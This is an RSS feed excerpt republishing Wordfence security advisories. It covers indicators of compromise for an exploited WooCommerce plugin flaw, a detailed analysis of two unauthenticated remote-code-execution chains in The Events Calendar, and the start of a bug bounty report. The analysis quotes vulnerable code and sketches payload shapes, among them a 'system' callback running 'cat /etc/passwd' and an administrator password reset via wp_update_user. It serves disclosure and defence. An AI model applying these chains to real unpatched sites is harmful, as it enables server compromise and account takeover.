<li>Over <strong>6,600</strong> blocked requests.</li>
</ul>
</li>
<li>104.194.9.138
<ul>
<li>Over <strong>6,100</strong> blocked requests.</li>
</ul>
</li>
<li>187.75.114.36
<ul>
<li>Over <strong>470</strong> blocked requests.</li>
</ul>
</li>
<li>114.10.43.203
<ul>
<li>Over <strong>310</strong> blocked requests.</li>
</ul>
</li>
<li>37.114.144.209
<ul>
<li>Over <strong>310</strong> blocked requests.</li>
</ul>
</li>
</ul>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-899.png" target="_blank" rel="noopener"><img decoding="async" loading="lazy" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-899.png" alt="Blocked attacks by IP WAF 899" width="1024" height="768" class="alignnone size-full wp-image-43206"></a></p>
<h2>Indicators of Compromise</h2>
<p>Because a successful attack results in an executable PHP file being written to the server, it is recommended to review your site for any unexpected or recently created <code>.php</code> files, particularly within the uploads directory. In the attacks we have observed, the uploaded files were often given names such as <code>shell.php</code>, though attackers may use other filenames as well.</p>
<p>We also recommend reviewing your web server access logs for requests to <code>/wp-admin/admin-ajax.php</code> with the action parameter set to <code>wwlc_file_upload_handler</code>, especially those originating from the following IP addresses:</p>
<ul>
<li>92.241.13.213</li>
<li>31.59.129.150</li>
<li>2a0f:85c1:840:5389::1</li>
<li>92.241.13.140</li>
<li>23.137.105.214</li>
<li>23.180.120.140</li>
<li>104.194.9.138</li>
<li>187.75.114.36</li>
<li>114.10.43.203</li>
<li>37.114.144.209</li>
</ul>
<p>If you find evidence of compromise, we recommend removing any unexpected files and unknown administrator accounts, and reviewing the site for backdoors. The absence of any such log entries does not guarantee that your website has not been compromised.</p>
<h2>Conclusion</h2>
<p>In today’s article, we covered the attack data for a critical-severity Unauthenticated Arbitrary File Upload vulnerability in the <a href="https://wholesalesuiteplugin.com/woocommerce-wholesale-lead-capture/" target="_blank" rel="noopener">WooCommerce Wholesale Lead Capture plugin</a> that allows unauthenticated threat actors to upload executable PHP files and achieve remote code execution, leading to complete site compromise. Our threat intelligence indicates that attackers have been targeting this vulnerability for months, with a large number of exploit attempts blocked between June 4th and June 17th, and also on July 1st and August 30th. The Wordfence firewall has already blocked over 100,000 exploit attempts targeting this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in WooCommerce Wholesale Lead Capture on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026.</p>
<p>Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to the latest patched version in order to maintain normal functionality. If you have friends or colleagues using this plugin, be sure to forward this advisory to them, as sites could still be unprotected and unpatched.</p>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>. If you need your site cleaned immediately, <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/attackers-actively-exploiting-critical-vulnerability-in-woocommerce-wholesale-lead-capture-plugin/" target="_blank" rel="noopener">Attackers Actively Exploiting Critical Vulnerability in WooCommerce Wholesale Lead Capture Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus Identifies Two Critical Unauthenticated Vulnerability Chains Leading to Remote Code Execution in The Events Calendar Plugin</title>
		<link>https://swiftupdates.ca/wordfence-argus-identifies-two-critical-unauthenticated-vulnerability-chains-leading-to-remote-code-execution-in-the-events-calendar-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Mon, 14 Sep 2026 17:41:49 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-identifies-two-critical-unauthenticated-vulnerability-chains-leading-to-remote-code-execution-in-the-events-calendar-plugin/</guid>

					<description><![CDATA[On August 21 and August 22, 2026, Wordfence Argus, created by the Wordfence Threat Intelligence team, identified two independent critical vulnerability chains in The Events Calendar, a WordPress plugin active on more than 600,000 websites. Both chains begin in the plugin’s widget-rendering pipeline and can ultimately lead to Remote Code Execution without authentication through two [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 21 and August 22, 2026, <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>, created by the Wordfence Threat Intelligence team, identified two independent critical vulnerability chains in <a href="https://wordpress.org/plugins/the-events-calendar/" target="_blank" rel="noopener">The Events Calendar</a>, a WordPress plugin active on more than 600,000 websites. Both chains begin in the plugin’s widget-rendering pipeline and can ultimately lead to Remote Code Execution without authentication through two separate methods.</p>
<p>The first chain uses PHP Object Injection to execute arbitrary operating system commands on the underlying server. The second chain bypasses the object-injection guard and abuses an arbitrary-callable primitive to reset an administrator’s password, after which an attacker can upload a malicious plugin and take complete control of the site.</p>
<p>No login, account registration, or social engineering is required, though the target event page must have comments enabled, which also requires The Events Calendar’s own “Show comments on event pages” option to be active. Both chains can be triggered through WordPress’s pending-comment preview without moderator approval. Successful exploitation could lead to complete site takeover, sensitive data theft, malware deployment, and a total loss of confidentiality, integrity, and availability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule protecting against known exploits targeting both vulnerabilities on August 22, 2026. Sites using the <a href="https://wordpress.org/plugins/wordfence/" target="_blank" rel="noopener">free version of Wordfence</a> will receive the same protection 30 days later, on September 21, 2026.</p>
<p>We sent full disclosure details for the first vulnerability to <a href="https://stellarwp.com/" target="_blank" rel="noopener">StellarWP</a>, the developer of The Events Calendar, on August 21, 2026, through the Wordfence Vulnerability Management Portal. The StellarWP team acknowledged the report on August 24, 2026 and released an initial patch on August 25, 2026, just four days after our initial disclosure.</p>
<p>We disclosed the second vulnerability on August 23, 2026, after validating the report and confirming the proof-of-concept exploit. StellarWP acknowledged it on August 24, 2026 and released a fully patched version on September 10, 2026. We commend the StellarWP team for its prompt response and rapid work to address both critical issues.</p>
<p>We strongly urge users to update The Events Calendar to the latest patched version, version 6.17.4.1 at the time of publication, as soon as possible.</p>
<h2>Vulnerability Summaries from <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">Wordfence Intelligence</a></h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c67346-534a-4b67-a904-fa148703707a" target="_blank" rel="noopener">The Events Calendar &lt;= 6.17.4 &#8211; Unauthenticated PHP Object Injection to Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78006" target="_blank" rel="noopener noreferrer">							CVE-2026-78006						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 6.17.4</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">6.17.4.1</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar" target="_blank" rel="noopener">The Events Calendar</a> <span class="wfvr-software-slug">[the-events-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The &#8220;The Events Calendar&#8221; plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 6.17.4 via the is_safe_widget_instance function. This is due to insufficient protection in is_safe_widget_instance, which can be bypassed because PHP fires magic methods during its pre-parse, combined with enable_rendering_widget_copied() forging a valid wp_hash integrity attribute before unserialize() is reached. This makes it possible for unauthenticated attackers to execute code on the server. This is exploitable without authentication or approval because the plugin&#8217;s V2 single-event template runs do_blocks() over buffered comment HTML, and WordPress returns a moderation-hash URL that allows an unauthenticated commenter to immediately view their own pending comment, delivering the injected block markup to the vulnerable code path before any moderation occurs. This does require comments to be enabled and visible on events.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c67346-534a-4b67-a904-fa148703707a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2ccfeb-6df6-4fee-96a5-94f8dd131f7c" target="_blank" rel="noopener">The Events Calendar &lt;= 6.17.3 &#8211; Unauthenticated Code Injection to Remote Code Execution via Widget &#8216;classes&#8217; Map Callable Invocation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78159" target="_blank" rel="noopener noreferrer">							CVE-2026-78159						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 6.17.3</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">6.17.3.1</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar" target="_blank" rel="noopener">The Events Calendar</a> <span class="wfvr-software-slug">[the-events-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The &#8220;The Events Calendar&#8221; plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 6.17.3 via the parse_array function. This is due to insufficient validation of the widget &#8216;classes&#8217; map, allowing a plain-array payload to bypass the is_safe_widget_instance() object check and reach the callable-invocation sink in Element_Classes::parse_array(). This makes it possible for unauthenticated attackers to execute code on the server. Exploitation requires that the targeted site has comments enabled on tribe_events posts and that at least one comment containing a crafted wp:legacy-widget block has been submitted, as the attack chain is triggered when do_blocks() processes the single-event HTML including the comment area.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2ccfeb-6df6-4fee-96a5-94f8dd131f7c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>The two vulnerabilities are independent exploitation chains built on the same dangerously exposed widget-rendering pipeline. A combination of insecure design decisions allows an anonymous commenter to place attacker-controlled Gutenberg block markup into a single-event page, obtain a valid integrity hash for a malicious widget instance, and reach one of two execution sinks.</p>
<p>The first chain smuggles a serialized object past a flawed validation routine and triggers a dangerous deserialization gadget. The second uses a valid plain-array payload to bypass the object guard entirely, inject attacker-controlled template variables, and invoke an arbitrary PHP callable.</p>
<h3>The Shared Attack Surface: Processing Comments as Gutenberg Blocks</h3>
<p>Both chains begin in the plugin’s V2 single-event template. In <code>get_v1_single_event_html()</code>, located in <code>src/Tribe/Views/V2/Template_Bootstrap.php</code>, the plugin uses output buffering to capture the entire rendered page, including the comment section, and then passes that buffer through WordPress’s <code>do_blocks()</code> function:</p>
<pre class="brush: php; first-line: 184; title: ; notranslate">
protected function get_v1_single_event_html() {
    // ...

    ob_start();
    if ( 'page' === $setting ) {
        echo '&lt;section id="tribe-events"&gt;';
    } else {
        echo '&lt;section id="tribe-events-pg-template" class="tribe-events-pg-template"&gt;';
    }
    tribe_events_before_html();
    tribe_get_view( 'single-event' );
    tribe_events_after_html();
    echo '&lt;/section&gt;';

    $html = ob_get_clean();

    if ( function_exists( 'do_blocks' ) ) {
        $html = do_blocks( $html );
    }

    return $html;
}
</pre>
<p>WordPress core does not run <code>do_blocks()</code> over comment text; it processes blocks in post content. By buffering the entire page and passing it through <code>do_blocks()</code>, The Events Calendar dramatically widens the block-parser attack surface to include content submitted by anonymous comment authors.</p>
<p>WordPress’s KSES comment sanitizer preserves HTML comment delimiters (<code>&lt;!-- ... --&gt;</code>), which Gutenberg uses as block markup. A malicious block embedded in a comment can therefore survive sanitization and reach the block parser. After a comment is submitted, WordPress ordinarily redirects the commenter to a moderation-hash URL (<code>?unapproved=N&amp;moderation-hash=H</code>) that allows the author to preview their own pending comment immediately. As a result, neither chain requires administrator approval, the attacker triggers widget rendering simply by viewing their own pending comment through the moderation-hash preview URL. Both the object-injection and arbitrary-callable sinks fire from this unapproved-comment preview.</p>
<h3>The Shared Integrity-Check Bypass</h3>
<p>Once <code>do_blocks()</code> encounters a <code>wp:legacy-widget</code> block whose <code>idBase</code> begins with <code>tribe-widget-</code>, The Events Calendar’s <code>enable_rendering_widget_copied()</code> filter in <code>src/Tribe/Views/V2/Widgets/Service_Provider.php</code> runs. The method base64-decodes the attacker-supplied widget instance, passes it to <code>is_safe_widget_instance()</code>, and, if the check succeeds, replaces the supplied hash with a freshly computed <code>wp_hash()</code> of the attacker’s data:</p>
<pre class="brush: php; first-line: 255; title: ; notranslate">
public function enable_rendering_widget_copied( $parsed_block ) {
    if ( ! isset( $parsed_block['attrs']['idBase'] ) ) {
        return $parsed_block;
    }

    $widget_id = $parsed_block['attrs']['idBase'];

    if ( ! str_starts_with( $widget_id, 'tribe-widget-' ) ) {
        return $parsed_block;
    }

    $instance = $parsed_block['attrs']['instance'] ?? [];

    if ( ! isset( $instance['encoded'], $instance['hash'] ) ) {
        return $parsed_block;
    }

    $serialized_instance = base64_decode( $instance['encoded'] );

    // Skip instances that do not pass validation.
    if ( ! $this-&gt;is_safe_widget_instance( $serialized_instance ) ) {
        return $parsed_block;
    }

    $instance['hash'] = wp_hash( $serialized_instance );

    $parsed_block['attrs']['instance'] = $instance;

    return $parsed_block;
}
</pre>
<p>WordPress core uses <code>wp_hash()</code> over a serialized widget instance as an integrity check before deserializing it. By generating a valid hash for attacker-controlled data, the plugin defeats core’s only integrity guard. An attacker can place any value, such as <code>"hash":"deadbeef"</code>, in the block markup, and The Events Calendar silently replaces it with a cryptographically valid hash before core inspects the instance.</p>
<p>From this shared point, the two exploitation paths diverge.</p>
<h2>Vulnerability Chain One: PHP Object Injection to Remote Code Execution</h2>
<p>The first chain exploits a critical flaw in <code>is_safe_widget_instance()</code>:</p>
<pre class="brush: php; first-line: 295; title: ; notranslate">
protected function is_safe_widget_instance( $serialized ) {
    $data = is_string( $serialized )
    // phpcs WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.PHP.DiscouragedPHPFunctions.serialize_unserialize
    ? @unserialize( $serialized, [ 'allowed_classes' =&gt; false ] )
    : false;

    return ! $this-&gt;contains_object( $data );
}
</pre>
<p>The method calls <code>unserialize()</code> with <code>allowed_classes =&gt; false</code> and checks whether the returned value contains a PHP object. If it does not, the widget instance is considered safe. This logic assumes that <code>allowed_classes =&gt; false</code> prevents object-related behavior during the preliminary parse, but that assumption is incorrect: PHP can invoke the <code>__unserialize()</code> and <code>__wakeup()</code> magic methods while parsing, before <code>unserialize()</code> returns.</p>
<p>An attacker can exploit this behavior by placing a complete, well-formed object inside a serialized structure and appending an invalid type token after it. A simplified structure looks like this:</p>
<pre>a:2:{i:0;&lt;gadget_object&gt;i:1;X}</pre>
<p>The preliminary parse encounters the malformed tail and returns <code>false</code>. The guard then evaluates <code>contains_object( false )</code>, finds no object in the returned value, and declares the payload safe. Later, when WordPress core’s legacy-widget renderer performs the real <code>unserialize()</code> call, PHP constructs the embedded object and triggers its magic methods before failing on the trailing invalid data. By then, the dangerous behavior has already occurred.</p>
<h3>The Deserialization Gadget</h3>
<p>The magic-method entry point is <code>__unserialize()</code> in <code>common/src/Tribe/Utils/Collection_Trait.php</code>, which is used by <code>Lazy_Post_Collection</code>:</p>
<pre class="brush: php; first-line: 247; title: ; notranslate">
public function __unserialize( array $data ): void {
    if ( method_exists( $this, 'custom_unserialize' ) ) {
        $this-&gt;items = $this-&gt;custom_unserialize( maybe_serialize( $data ) );

        return;
    }

    $this-&gt;items = $data;
}
</pre>
<p>This method dispatches directly to <code>custom_unserialize()</code> in <code>src/Tribe/Collections/Lazy_Post_Collection.php</code>, which contains the final execution sink:</p>
<pre class="brush: php; first-line: 82; title: ; notranslate">
protected function custom_unserialize( $serialized ) {
    $unserialized = unserialize( $serialized );

    if ( false === $unserialized || ! is_array( $unserialized ) ) {
        return null;
    }

    return array_map( $unserialized['callback'], $unserialized['ids'] );
}
</pre>
<p>The method deserializes attacker-controlled data and passes <code>$unserialized['callback']</code> and <code>$unserialized['ids']</code> directly to <code>array_map()</code> without validation. By setting <code>callback</code> to <code>system</code> and <code>ids</code> to an array containing a shell command, such as <code>id</code> or <code>cat /etc/passwd</code>, an attacker can execute arbitrary operating system commands as the web server user.</p>
<p>This chain provides direct Remote Code Execution and can result in complete compromise of the affected WordPress installation.</p>
<h2>Vulnerability Chain Two: Arbitrary PHP Callable to Remote Code Execution</h2>
<p>The second chain reaches the same widget-instance validation routine but does not require a serialized object. It instead uses a plain PHP array, which passes <code>is_safe_widget_instance()</code> truthfully and completely because it contains no object. The object-injection guard therefore provides no protection against this exploitation path.</p>
<p>After The Events Calendar generates a valid hash for the array, WordPress core deserializes the instance and passes it to the widget’s <code>widget()</code> method. <code>Widget_Abstract::setup_arguments()</code> merges the attacker-controlled array directly into <code>$this-&gt;arguments</code> with <code>array_merge()</code>.</p>
<p>The template engine later calls <code>extract( $this-&gt;context )</code> on line 1066 of <code>common/src/Tribe/Template.php</code>. This turns every attacker-controlled array key, including <code>classes</code>, into a local variable in the template scope.</p>
<p>An attacker can force the widget’s event query to return no results, for example by appending <code>?tribe_paged=99</code> to the URL. This causes the <code>messages.php</code> sub-template to load. The template merges the attacker-controlled <code>$classes</code> variable with a default class list and passes the result to <code>tec_classes()</code>:</p>
<pre class="brush: php; first-line: 23; title: ; notranslate">
if ( empty( $messages ) ) {
    return;
}

global $wp_version;

$default_classes = [
    'tribe-events-header__messages',
    'tribe-events-c-messages',
    'tribe-common-b2',
];
$classes    = isset( $classes ) ? array_merge( $default_classes, $classes ) : $default_classes;
$attributes = isset( $attributes ) ? (array) $attributes : [];
</pre>
<p>The <code>tec_classes()</code> function forwards this merged array to <code>TribeUtilsElement_Classes::parse_array()</code>. The utility is intended to collect CSS class names for widget markup and supports Closure values for dynamic class generation. The critical flaw is that its callable check is not restricted to closures. It accepts any value for which PHP’s <code>is_callable()</code> returns true, including strings naming globally available functions:</p>
<pre class="brush: php; first-line: 201; title: ; notranslate">
protected function parse_array( array $values ) {
    foreach ( $values as $key =&gt; $value ) {
        if ( is_int( $key ) ) {
            if ( is_bool( $value ) ) {
                $this-&gt;parse( $key, $value );
            } else {
                $this-&gt;parse( $value );
            }
        } elseif ( is_string( $key ) ) {
            if ( $value instanceof Closure || is_callable( $value ) ) {
                $value = $value( $this-&gt;results );
            }

            $this-&gt;parse_string( $key, tribe_is_truthy( $value ) );
        }
    }
}
</pre>
<p>Because <code>is_callable( 'wp_update_user' )</code> returns true, an attacker can construct a <code>classes</code> map containing entries equivalent to:</p>
<pre>{
    "ID": true,
    "user_pass": true,
    "zz": "wp_update_user"
}</pre>
<p>As <code>parse_array()</code> processes the map in insertion order, it adds the <code>ID</code> and <code>user_pass</code> keys to <code>$this-&gt;results</code> with boolean true values. When the loop reaches the <code>zz</code> entry, <code>is_callable( 'wp_update_user' )</code> succeeds and the function invokes <code>wp_update_user( $this-&gt;results )</code>.</p>
<p>At that point, <code>$this-&gt;results</code> contains values equivalent to <code>['ID' =&gt; true, 'user_pass' =&gt; true, ...]</code>. WordPress interprets this as an instruction to change the password of user ID 1 to the string 1. The in-process call to <code>wp_update_user()</code> does not perform a capability check. The attacker can then log in as the administrator and upload a malicious plugin, achieving full Remote Code Execution and complete site takeover.</p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-21</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>We discovered the first vulnerability</div>
<div>Wordfence Argus found, and the Wordfence Threat Intelligence team validated, the PHP Object Injection to Remote Code Execution vulnerability in The Events Calendar.</div>
</div>
</div>
<div>
<div>2026-08-21</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>We disclosed the first vulnerability to the vendor</div>
<div>We sent full disclosure details for the PHP Object Injection chain to the StellarWP team through the Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-22</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Wordfence Premium, Care, and Response users received a firewall rule</div>
<div>We released a firewall rule protecting Wordfence Premium, Care, and Response customers against known exploits targeting both vulnerabilities.</div>
</div>
</div>
<div>
<div>2026-08-23</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>We discovered the second vulnerability</div>
<div>Wordfence Argus found, and the Wordfence Threat Intelligence team validated, the independent arbitrary-callable vulnerability leading to Remote Code Execution.</div>
</div>
</div>
<div>
<div>2026-08-23</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>We disclosed the second vulnerability to the vendor</div>
<div>Full disclosure details for the arbitrary-callable report were sent to StellarWP through the Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-24</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Vendor acknowledged the first report</div>
<div>The StellarWP team acknowledged the PHP Object Injection report and began working on a fix.</div>
</div>
</div>
<div>
<div>2026-08-24</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Vendor acknowledged the second report</div>
<div>The StellarWP team acknowledged the arbitrary-callable report and began working on a fix.</div>
</div>
</div>
<div>
<div>2026-08-25</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Patch released for the first vulnerability</div>
<div>StellarWP released a patch addressing the PHP Object Injection chain.</div>
</div>
</div>
<div>
<div>2026-09-01</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Fully patched version released</div>
<div>StellarWP released a fully patched version addressing the arbitrary-callable vulnerability.</div>
</div>
</div>
<div>
<div>2026-09-21</div>
<div>
<div></div>
<div></div>
</div>
<div>
<div>Wordfence free users receive the firewall rule</div>
<div>Sites running the free version of Wordfence receive the same firewall rule 30 days after the Premium release.</div>
</div>
</div>
</div>
<div><span><i></i> Wordfence action</span><br />
<span><i></i> Vendor / external action</span></div>
<h2>Conclusion</h2>
<p>In this post, we detailed two independent critical vulnerability chains in The Events Calendar affecting vulnerable releases up to and including version 6.17.4. The first allows an unauthenticated attacker to execute arbitrary operating system commands through PHP Object Injection. The second allows an unauthenticated attacker to invoke arbitrary PHP functions with attacker-controlled arguments, which can be used to reset an administrator’s password and upload a malicious plugin.</p>
<p>Both chains arise from the plugin processing attacker-controlled comment content as Gutenberg blocks, generating valid integrity hashes for attacker-supplied widget instances, and passing that data into unsafe downstream behavior. Any affected site with comments enabled on event pages is at direct risk from anonymous attackers on the internet.</p>
<p>We strongly encourage all WordPress site owners and administrators using The Events Calendar to verify that they are running the latest patched version, 6.17.4.1, immediately. Neither chain requires a login or account registration, and both can be triggered without moderator approval through the pending-comment preview flow. Successful attacks can result in complete site and server compromise.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule protecting against known exploits targeting both vulnerabilities on August 22, 2026. Sites using the <a href="https://wordpress.org/plugins/wordfence/" target="_blank" rel="noopener">free version of Wordfence</a> will receive the same protection 30 days later, on September 21, 2026.</p>
<p>If you know someone who uses The Events Calendar on a WordPress site, we strongly recommend sharing this advisory with them so they can update promptly and keep their site secure.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-argus-identifies-two-critical-unauthenticated-vulnerability-chains-leading-to-remote-code-execution-in-the-events-calendar-plugin/" target="_blank" rel="noopener">Wordfence Argus Identifies Two Critical Unauthenticated Vulnerability Chains Leading to Remote Code Execution in The Events Calendar Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Bug Bounty Program Monthly Report – May 2026</title>
		<link>https://swiftupdates.ca/wordfence-bug-bounty-program-monthly-report-may-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Mon, 14 Sep 2026 15:39:07 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-bug-bounty-program-monthly-report-may-2026/</guid>

					<description><![CDATA[In May 2026, the Wordfence Bug Bounty Program received 1095 vulnerability submissions from our growing community of security researchers working to improve the overall security posture of the WordPress ecosystem. These submissions are reviewed, triaged, and processed by the Wordfence Threat Intelligence team, with validated vulnerabilities responsibly disclosed to vendors, often through the Wordfence Vulnerability [&#8230;]]]></description>
										<content:encoded><![CDATA[<div>
<p>In May 2026, the Wordfence Bug Bounty Program received 1095 vulnerability submissions from our growing community of security researchers working to improve the overall security posture of the WordPress ecosystem. These submissions are reviewed, triaged, and processed by the Wordfence Threat Intelligence team, with validated vulnerabilities responsibly disclosed to vendors, often through the <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal – a free service for all WordPress vendors</a>, and protected through the <a href="https://www.wordfence.com/products/" target="_blank" rel="noopener">Wordfence Firewall</a> where appropriate.</p>
<p>Our mission with the <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Wordfence Bug Bounty Program</a> is to engage the broader security community in identifying and responsibly disclosing vulnerabilities in WordPress plugins and themes, so we can work with vendors to get them patched before attackers discover them. This collaborative effort enables Wordfence to accelerate patch adoption, provide early protection to millions of websites, and ensure that high-quality vulnerability intelligence reaches the WordPress ecosystem as efficiently as possible. It also ensures that we are able to remediate vulnerabilities before attackers are able to discover them and start exploiting them. <strong>That is why we reward researchers for valid submissions, and why we remain committed to processing every report with transparency, accuracy, and urgency.</strong></p>
<div>
<p><strong><img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f50d.png" alt="&#x1f50d;" class="wp-smiley"> Join the Wordfence Bug Bounty Program</strong></p>
<hr>
<p>Help secure the WordPress ecosystem while earning rewards for your security research.</p>
<p>We’re actively seeking skilled researchers to identify vulnerabilities in WordPress plugins and themes, with prompt payments and transparent processes.</p>
<div><a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Start Your Security Research Journey</a></div>
</div>
